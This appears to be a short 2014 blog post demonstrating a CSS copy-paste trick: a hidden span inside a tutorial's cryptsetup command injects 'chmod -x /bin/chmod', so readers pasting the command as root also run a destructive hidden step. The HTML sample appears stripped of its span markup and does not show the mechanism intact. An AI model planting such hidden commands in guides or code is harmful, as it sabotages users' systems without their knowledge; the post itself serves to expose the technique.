--- layout: post title: "Dangerous CSS: how to unnoticeably destroy *nix system" date: 2014-01-25 23:16 comments: true categories: [] cover: /images/cover/avatar.png keywords: description: --- Let's do bad things. I've got an idea -- provide a nice looking Linux command on a blog/wiki. Yep, that's almost all. Imagine you're setting up dm-crypt encryption. You'll find a guide with commands ready to copy & paste into your terminal. Almost all commands have to be run as root, that's good for me. Something like this: {% codeblock lang:bash %} cryptsetup -v --cipher aes-xts-plain64 --key-size 256 --hash sha512 --iter-time 5000 --use-urandom --verify-passphrase luksFormat {% endcodeblock %} Oh, almighty CSS, now it's your turn. Go to [this page](http://cinan.sk/pub/dangerous-css.html) and copy the command. I added some javascript stuff to make text selecting easier -- **javascript isn't required**. Now paste the copied text somewhere. As you can see, there's bonus command (```chmod -x /bin/chmod```). Nice, isn't it? Code, obviously: {% codeblock lang:html %}
#
cryptsetup -v --cipher aes-xts-plain64 --key-size 256 --hash 
		sha512 --iter-time 500;chmod -x /bin/chmod; 0 --use-urandom --verify-passphrase luksFormat <device>
	
{% endcodeblock %} What's happening here: I'm selecting ```pre``` content which also contains another ```span``` element. Tested on Chromium, Firefox, Opera and Safari.